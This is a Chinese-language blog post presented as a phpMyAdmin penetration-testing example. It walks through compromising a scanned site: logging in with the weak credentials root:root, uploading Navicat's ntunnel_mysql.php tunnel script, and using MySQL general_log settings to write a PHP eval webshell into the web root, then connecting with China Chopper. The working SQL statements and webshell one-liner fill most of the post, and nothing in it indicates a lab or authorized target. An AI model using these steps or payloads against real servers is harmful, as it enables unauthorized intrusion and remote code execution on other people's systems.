溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Phpmyadmin滲透測試的示例

發(fā)布時間:2021-03-12 13:40:25 來源:億速云 閱讀:294 作者:小新 欄目:數(shù)據(jù)庫

這篇文章給大家分享的是有關Phpmyadmin滲透測試的示例的內(nèi)容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

首先通過目錄掃描對某站進行掃描,發(fā)現(xiàn)存在phpmyadmin,嘗試弱口令root:root很幸運進去了

Phpmyadmin滲透測試的示例

嘗試使用Navicate進行數(shù)據(jù)庫連接返回禁止遠程連接數(shù)據(jù)庫:

Phpmyadmin滲透測試的示例

但是遠程命令執(zhí)行發(fā)現(xiàn)本地3306端口時開放的,于是嘗試通過代理進行連接:

Phpmyadmin滲透測試的示例

Navicat安裝目錄下上傳ntunnel_mysql.php文件(數(shù)據(jù)庫的代理腳本)到目標服務器任意web站點目錄(后面getshell后上傳的)

Phpmyadmin滲透測試的示例

上傳到D:/phpStudy/WWW目錄進行訪問http://XXX/ntunnel_mysql.php 測試成功

Phpmyadmin滲透測試的示例

進行測試連接:

(此時,在本地打開Navicat配置http連接,這里的通道地址就寫你上面訪問的那個url,說白點兒就是個代理端,勾上使用base64編碼,防止waf從中作祟,然后主機名寫localhost,賬號密碼寫lnmp01本地數(shù)據(jù)庫用戶的賬號即可,因為要連接lnmp01本地的mysql)

Phpmyadmin滲透測試的示例

利用日志文件

mysql 5.0版本以上會創(chuàng)建日志文件,修改日志的全局變量,也可以getshell。但是也要對生成的日志有可讀可寫的權限。

set global general_log = "ON";   #當開啟general時,所執(zhí)行的sql語句都會出現(xiàn)在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所執(zhí)行的sql語句就會對應生成進而getshell
SET global general_log_file='D:/phpStudy/WWW/test1234.php';  #對應就會生成test1234.php文件
select '<?php eval($_POST[2019]);?>';          #將一句話木馬寫入test1234.php文件

菜刀連接:

Phpmyadmin滲透測試的示例

感謝各位的閱讀!關于“Phpmyadmin滲透測試的示例”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。

AI